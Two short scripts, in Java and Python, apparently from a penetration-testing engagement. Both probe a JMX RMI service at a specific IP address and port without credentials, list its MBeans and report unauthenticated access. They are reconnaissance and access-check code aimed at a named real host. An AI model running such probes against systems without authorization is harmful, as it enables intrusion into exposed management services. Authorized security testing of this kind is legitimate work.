File: engagement/soultv.com.br/enum/video02/JmxConnect.java
import javax.management.remote.*;
import javax.management.*;
import java.util.*;
public class JmxConnect {
  public static void main(String[] a) throws Exception {
    String[] urls = {
      "service:jmx:rmi:///jndi/rmi://160.202.130.243:8084/jmxrmi",
      "service:jmx:rmi://160.202.130.243:8084/",
      "service:jmx:rmi://160.202.130.243:8084",
      "service:jmx:rmi:///jndi/rmi://160.202.130.243:8084/jmxrmi?ssl=false",
    };
    for (String url : urls) {
      System.out.println("=== " + url + " ===");
      try {
        JMXServiceURL u = new JMXServiceURL(url);
        Map<String,Object> env = new HashMap<>();
        // env credentials empty -> test if auth required
        JMXConnector c = JMXConnectorFactory.connect(u, env);
        MBeanServerConnection mbsc = c.getMBeanServerConnection();
        String[] domains = mbsc.getDomains();
        System.out.println("  CONNECTED. Domains: " + Arrays.toString(domains));
        int n = mbsc.getMBeanCount();
        System.out.println("  MBean count: " + n);
        Set<ObjectName> beans = mbsc.queryNames(null, null);
        int cnt=0;
        for (ObjectName on : beans) {
          cnt++;
          if (cnt<=15) System.out.println("    " + on);
        }
        System.out.println("  >>> UNAUTH JMX ACCESS CONFIRMED <<<");
        c.close();
        return;
      } catch (Exception e) {
        System.out.println("  ERR: " + e.getClass().getSimpleName() + ": " + e.getMessage());
      }
    }
  }
}

File: engagement/soultv.com.br/enum/video02/jmx_connect.py
#!/usr/bin/env python3
from jmxquery import JMXConnection, JMXQuery
import sys
urls = [
    "service:jmx:rmi:///jndi/rmi://160.202.130.243:8084/jmxrmi",
    "service:jmx:rmi://160.202.130.243:8084/jndi/rmi://160.202.130.243:8084/jmxrmi",
]
for url in urls:
    print(f"=== Trying unauth: {url} ===")
    try:
        # env without credentials
        conn = JMXConnection(url, [({}, {})])
        queries = [JMXQuery("*:*")]
        metrics = conn.query(queries)
        cnt=0
        for m in metrics:
            cnt+=1
            if cnt<=5: print("  ", m)
        print(f"  TOTAL MBeans: {cnt}")
        print("  UNAUTH JMX ACCESS CONFIRMED")
        break
    except Exception as e:
        print(f"  ERR: {type(e).__name__}: {e}")
